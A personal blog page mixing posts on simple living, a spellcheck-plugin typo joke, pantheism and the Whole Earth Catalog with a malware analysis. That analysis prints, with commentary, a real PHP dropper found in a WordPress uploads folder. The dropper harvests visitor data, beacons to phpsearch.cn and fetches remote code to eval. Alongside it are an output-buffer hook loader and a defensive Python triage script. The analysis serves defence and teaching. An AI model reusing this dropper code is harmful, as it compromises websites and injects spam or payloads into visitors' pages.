This page intentionally left ugly
A programmer and technology enthusiast destroys programming and technology. Welcome to the dichotomy of my existence...
Feel free to browse the experiments and pick up anything you may find useful. Or head over to the obligatory introduction.
WARNING: I post a lot of code on this blog and some of it gets mangled by WordPress formatting. Please double-check for missing or extra quotes, backslashes, '<' and '>' transformed into '&lt;' and '&gt;', and other problems. All the code posted here has been verified to work before I post it, except in cases where I explicitly mention that it's incomplete.
Small and Common Sense Living
Ever think to yourself how much of what you own is actually making you happy? Or how about whether the house you live in is actually sustainable in terms of budget and the environment? How much of our legal system and social norms force people into houses they don’t need?
What would you really consider to be a home vs just a house?
Jay Shafer talks a little about how we’ve talked, legislated and fooled ourselves into a type of living that’s making most of us fundamentally unhappy and, in many cases, homeless and destitute instead of enjoying life.
Tim Guiles goes into more detail in exploring this “what we need vs. what we want” problem… which shouldn’t really be a problem in the first place. He also describes the experience of the living space seeming to shrink as construction begins, only to open up dramatically once the windows are installed. Touching on Jay Shafer’s comments above, it’s the sense of bringing the outside environment indoors.
Damn you, brain! Why can’t YOU run spellcheck?!
I just came back from a late night coffee run and decided to sit down to work a little on my discussion forum before going to bed (I need coffee to sleep… don’t ask).
It was all fine and dandy until I decided to add a little spellcheck option to the input form. I’m not expecting that many people to use it, since this is also meant to be mobile friendly and a lot of posts will be txtspeak gibberish anyway, but I thought it would be nice to have the feature.
Let me preface this by saying that I have never been good at spelling, or even OK at spelling for that matter. I was even rubbish at spelling in Sinhalese when I was a little kid, so this isn’t just an English thing. I don’t know if it’s some undiagnosed form of dyslexia, or maybe I’m typing faster than the throughput of my cerebral plumbing, or vice versa; either way, I just can’t spell.
So when I started writing the spellcheck functionality, I thought it was a simple, straightforward affair: a dictionary source, a backend response generator and some client-side jQuery witchcraft to make this work without any added burden to the UI.
The burden, it turns out, was to my prefrontal cortex.
E.g. this was meant to be just a simpler version of the spellcheck plugin which comes with TinyMCE. I wasn’t using an IDE for the JS side of this, so I figured I’d be fine with just Notepad.
What’s wrong with this?
(function() {
    tinymce.create('tinymce.plugins.SpelchekcPlugin', {
        inti : function(ed, url) {
            // Some stuff will happen here
        },
        createControl : function(n, cm) {
            return null;
        },
        getInfo : function() {
            return {
                longname: 'Spellcheck Plugin',
                author : 'eksith'
            };
        }
    });
})();
Sometimes, I feel like a construction worker who’s always safe with equipment, always wears a helmet, always on time and always forgets his pants.
Anatomy of a PHP trojan
A very small sample of how incorrectly configured websites can invite trouble for visitors. I was prompted to write about this after hearing about a hacking incident on another friend’s website. The backend was compromised with no apparent user involvement, which means another site on the same server possibly served as the backdoor, or perhaps the server admins didn’t set the permissions correctly.
A little while ago, I was hosting a website which had been running an older version of WordPress. The site owners had long since let the installation lapse and, as always, there were vulnerabilities in the upload handling which were exploited. Since I had let the owners do whatever they pleased with their space and given them a lot of freedom, I didn’t pay as much attention as I should have. No other site on the server was compromised since each had sandboxed access.
Certain WordPress plugins require an inordinate amount of privileges, which is one big reason to run a site with the minimum necessary plugins and to always keep them up to date. There is also no reason to keep stale files on the server or to allow arbitrary write and upload privileges when the bare minimum will do. The same goes for execution: a directory that exists only to hold uploads has no business executing PHP, and a web server rule that refuses to run scripts from it would have left a dropped 189715.php inert.
The following is a file called 189715.php found in the /wp-uploads folder of this website; the same code was found in other locations under different numeric filenames. It was all jammed into one line, so I’ve expanded it here for clarity. Certain portions have been redacted:
<?php /**/eval(base64_decode('[BASE64 ENCODED STRING]')); ?>
<?
error_reporting(0); // silence warnings so a failed fetch leaves nothing in the logs
// Harvest request and environment details. The fallback to the bare globals
// ($HTTP_HOST and friends) keeps it working on old register_globals setups.
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
// Everything above, base64-encoded and dot-separated, becomes the query
// string sent to the control server on every hit.
$z="/?" .
    base64_encode($a). "." .
    base64_encode($b) . "." .
    base64_encode($c) . "." .
    base64_encode($d) . "." .
    base64_encode($e) . "." .
    base64_encode($f) . "." .
    base64_encode($g) . "." .
    base64_encode($h) . ".e." .
    base64_encode($i) . "." .
    base64_encode($j);
// $f is overwritten here: the referrer is gone, replaced by the controller domain.
$f=base64_decode("cGhwc2VhcmNoLmNu");
// Operator back door: when the dropper itself is the requested script and
// ?q= carries the secret (checked by MD5), the host comes from ?id= instead.
if (basename($c)==basename($i) && isset($_REQUEST["q"]) &&
    md5($_REQUEST["q"])=="cfe044f810cd8d8e6e5759d4005cf72f")
    $f=$_REQUEST["id"];
// Stage two, three ways: remote include (needs allow_url_include), then
// file_get_contents + eval (needs allow_url_fopen), then curl + eval.
if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
    eval($c);
else{
    $cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
    curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
    $o=curl_exec($cu);
    curl_close($cu);
    eval($o);
};
die(); ?>
Variable $z was essentially a query string: every value gathered above, base64-encoded and joined with dots, so the control server learns the host, path, referrer, user agent and visitor IP on every hit.
The string “cGhwc2VhcmNoLmNu” assigned to $f decodes to “phpsearch.cn”, this particular spammer’s domain (note that $f is reused; the referrer it held earlier had already been folded into $z). “aHR0cDovL2FkczMu” decodes to the prefix “http://ads3.”, so this was a domain set up to inject spam, and I’m sure the domain itself was expendable. “aHR0cDovLzcxLg==” is the prefix “http://71.” and “aHR0cDovLzcu” is “http://7.”.
The three branches that follow are the same thing done three ways. First it tries include() on the remote URL, which executes the fetched file directly but only works when allow_url_include is on. If that fails it fetches the file with file_get_contents() (which needs allow_url_fopen) and runs it through eval(); if that fails too, it fetches it with curl and eval()s the result. The condition in between is the operator’s back door: when the dropper itself is the requested script and ?q= carries a value whose MD5 matches the hard-coded hash, the host is taken from ?id= instead, so the controller can repoint every infected site at a new server without touching the files again.
The [BASE64 ENCODED STRING] was actually another encoded function :
// Runs on every request the dropper is pulled into: loads the second-stage
// file hidden under a .css.php name and, if it defines gml() and dgobh(),
// registers dgobh() as the output-buffer callback, so every page the site
// renders is passed through it before being sent to the browser.
if(function_exists('ob_start') && !isset($GLOBALS['mfsn'])){
    $GLOBALS['mfsn']='[REDACTED ROOT]/wp-content/upgrade/openid/openid/Auth/OpenID/style.css.php';
    if(file_exists($GLOBALS['mfsn'])){
        include_once($GLOBALS['mfsn']);
        if(function_exists('gml') && function_exists('dgobh'))
        {ob_start('dgobh');}
    }
}
The [REDACTED ROOT] is, of course, the WordPress installation directory on this server, and in this case the compromised plugin was OpenID.
The Auth/OpenID directory was full of junk that was surreptitiously uploaded as well. Also, the content of style.css.php was another massive block of base64-encoded code (which I was unable to decode), and the “mfsn” variable held the location of another file that was meant to be dynamically included at runtime. I was unable to find what the “gml” and “dgobh” functions were, but I can guess that it included everything from more injection code to spam to even drive-by downloads. Whatever dgobh() does, handing it to ob_start() means every page the site renders passes through it before reaching the browser, which is exactly the hook an infection needs to splice spam links or a hidden iframe into otherwise clean output; and a .css.php name is easy to overlook in a directory listing.
After running a scan on this server, this file and those like it turned out to be called the Small-AH trojan.
PHP trojans often employ base64 encoding, and sometimes split the encoded string into several pieces that are only joined back together before base64_decode() and eval(). That makes the code harder to spot, and harder still to figure out what it actually does, especially in a big file and with just a cursory glance.
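As an added example, not code from this post, here is a small Python triage script that does mechanically what the post does by hand: it peels the base64 literals out of a PHP file (descending into decoded layers that contain more of them), lists the execution and fetch sinks seen in any layer, and reassembles beacon hosts from decoded “http://sub.” prefixes and bare domains, the way the dropper builds “http://ads3.” . $f . $z. The sample dropper embedded in it is constructed for the demo and is not the real 189715.php; the function names are my own.

```python
"""Triage helper for eval(base64_decode(...)) droppers of the kind shown above.

Added example, not the blog's code. The constructed sample below stands in
for the dropper in the post; it is not the real 189715.php.
"""
import base64
import binascii
import os
import re
import tempfile

# A base64 literal passed straight to base64_decode(); both quote styles
# occur in the sample on this page.
B64_LITERAL = re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=]+)\1\s*\)""")
# Sinks worth flagging when found in the file or in any decoded layer.
SINKS = ("eval(", "include(", "include_once(", "file_get_contents(", "curl_init(")
DOMAIN = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)*\.[a-z]{2,}$", re.I)
URL_PREFIX = re.compile(r"^https?://[a-z0-9.-]*\.$", re.I)


def decode_literals(php_src, depth=0, max_depth=5):
    """Return (depth, encoded, decoded) for every base64_decode() literal.

    Decoded text that itself calls base64_decode() is descended into, since
    this family stacks one encoded layer inside another. Undecodable
    literals are kept with decoded=None rather than dropped.
    """
    found = []
    for m in B64_LITERAL.finditer(php_src):
        enc = m.group(2)
        try:
            dec = base64.b64decode(enc, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            dec = None
        found.append((depth, enc, dec))
        if dec and depth < max_depth and "base64_decode(" in dec:
            found.extend(decode_literals(dec, depth + 1, max_depth))
    return found


def beacon_hosts(literals):
    """Join decoded 'http://7.' style prefixes to decoded bare domains, which
    is how the dropper builds its fetch URL (prefix . $f . $z)."""
    decoded = [d for _, _, d in literals if d]
    prefixes = [d for d in decoded if URL_PREFIX.match(d)]
    domains = [d for d in decoded if DOMAIN.match(d)]
    return {p + d for p in prefixes for d in domains}


def triage(php_src):
    """Summarise one PHP source string: decoded layers, sinks seen, hosts,
    and a verdict (eval() present together with at least one decoded layer).
    Plain base64 alone is not a verdict; plenty of legitimate plugins embed
    base64 icons and the like."""
    literals = decode_literals(php_src)
    layers = php_src + "\n" + "\n".join(d for _, _, d in literals if d)
    return {
        "literals": literals,
        "sinks": [s for s in SINKS if s in layers],
        "hosts": beacon_hosts(literals),
        "suspicious": "eval(" in layers and any(d for _, _, d in literals),
    }


def scan_tree(root, exts=(".php", ".phtml", ".php5")):
    """Yield (path, report) for flagged PHP files under root. Pointed at
    wp-content/uploads, anything it yields is a finding, because no PHP
    belongs there in the first place."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                report = triage(fh.read())
            if report["suspicious"]:
                yield path, report


# Constructed sample (not the real dropper): an eval(base64_decode()) stub
# whose decoded body decodes the controller domain and two URL prefixes,
# then remote-includes or fetch-and-evals stage two, as in the post.
_STAGE_TWO_LOADER = (
    '$f=base64_decode("cGhwc2VhcmNoLmNu");'
    'if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));'
    'else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z)) eval($c);'
)
SAMPLE_DROPPER = (
    "<?php /**/eval(base64_decode('"
    + base64.b64encode(_STAGE_TWO_LOADER.encode()).decode()
    + "')); ?>"
)


def demo():
    """Drop the sample into a throwaway uploads tree next to a clean index.php
    and sweep it; returns the basenames that were flagged."""
    with tempfile.TemporaryDirectory() as root:
        uploads = os.path.join(root, "wp-content", "uploads")
        os.makedirs(uploads)
        with open(os.path.join(uploads, "189715.php"), "w") as fh:
            fh.write(SAMPLE_DROPPER)
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php echo 'clean'; ?>")
        return sorted(os.path.basename(p) for p, _ in scan_tree(root))


if __name__ == "__main__":
    report = triage(SAMPLE_DROPPER)
    for depth, enc, dec in report["literals"]:
        print("  " * depth + f"{enc[:24]}... -> {dec!r}")
    print("sinks:", report["sinks"])
    print("hosts:", sorted(report["hosts"]))
    print("flagged:", demo())
```

Run it against a copy of the web root taken before any cleanup, so the beacon hosts can be blocked and searched for in the access logs. It will not catch the split-string variant described above on its own (the pieces are joined at runtime, so no single literal decodes), which is why the verdict also keys on eval(); treat any eval() in an uploads directory as a finding regardless of what sits inside it.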
Site of the Week: Pantheism.net
I’ve been fascinated with the Pantheism movement for a very long time, and this is probably the closest modern, spiritually prefaced interpretation of the age-old idea of not [pooping] where you eat. I.e. live and let live, responsibly. Pantheism.net is a good resource for people just starting to learn the details.

Are you searching for a path which focuses on Earth in the Cosmos, rather than some imaginary beyond? Are you more concerned with saving the planet than saving your eternal soul?
Do you hunger for a spirituality that respects individual choice rather than pushing prejudice down people's throats, and that values reason rather than fanaticism?
Do you find it impossible to believe in supernatural beings, and difficult to conceive of anything more worthy of the deepest respect than the beauty of Nature or the power and mystery of the Universe?
Do you feel a deep sense of peace and belonging and wonder in the midst of Nature?
If you answered yes to these questions, then you will feel at home in the World Pantheist Movement.
Whole Earth Catalog: A roadmap to humanity
I found this volume at a tag sale some years ago and thought it was just a curiosity at the time. I bought it for a few dollars and took it home only to forget about it until recently (moving does that to you sometimes).
After getting another chance to go over everything I’ve been missing, I have to say… This is by far one of the best resources on simple living, sustainability and even our own peculiarities (I.E. there is no censorship). The Whole Earth Catalog should be in everyone’s library. If anything it can really open some eyes that are sewn shut with self-centeredness these days.
It’s one of the more revolutionary publications that will sorely be missed today.

Subtitling this "Access to Tools" has to be one of the biggest understatements in publishing. It's oh-so-much-more
The catalog is a year older than me! And it really does cover the Whole Earth!
The map has changed a bit since this edition, but the topics it covers, vast in breadth and depth, go from “Understanding Whole Systems”, which includes Laws of form, Space, Eco-ethics, Evolution, Natural history and Plants, to “Community”, which includes Recycling, Rural emergency, Home nursing, Women’s health, Childbirth (in graphic detail), Sex (also in “detail” of sorts), Consumer reports and everything in between. It’s a who’s who and what’s what of basic and enhanced living.
While browsing through this time, I came across an article on Sri Lanka! Specifically the concept of “Shramadana”, which is a contraction of the Sarvodaya Shramadana Movement in Sri Lanka. The article goes into a specific example at work; however, considering this was published before the civil war, I don’t know how many of these people are still around. Hopefully many. Their example will be one of the few things that will keep the country going.

"It does not require oil, gas, coal or nukes; it empowers people not machines; it is shramadana. Literally meaning the giving (dana) of human energy (shrama)"
The concept can best be summarized as using human equity toward completing projects for the community. Anyone can grab a tool and participate, provided you’re of able body and sound mind. It doesn’t matter what your social status is; a banker and a farmer are equals in terms of what they can contribute in human energy.
What really got me interested are the aspects of environmental consciousness and the examples of “better” and “wiser” living that we could really use right now. It really drives home how far ahead of its time this was, as only now are we starting to understand the consequences of our actions.
Then there are the creative aspects of what we can actually do about this. The sustainability pointers in this are, I think, invaluable today more than ever.
The book is full of examples like these for simple, sustainable living as well as creative solutions to real world problems that are oddly still applicable by and large today.
Then there are also aspects of humanity that some of us still wouldn’t dare discuss openly or honestly. It’s an amazing testament to how much popular publications censor themselves on real issues while advancing pointless topics. Talk about being hypocritical prudes.
Did I mention there’s no censorship in this book? Can you imagine a popular publication making mention of something like this today?
And that, boys and girls, is why I keep thinking I was born a few decades too late.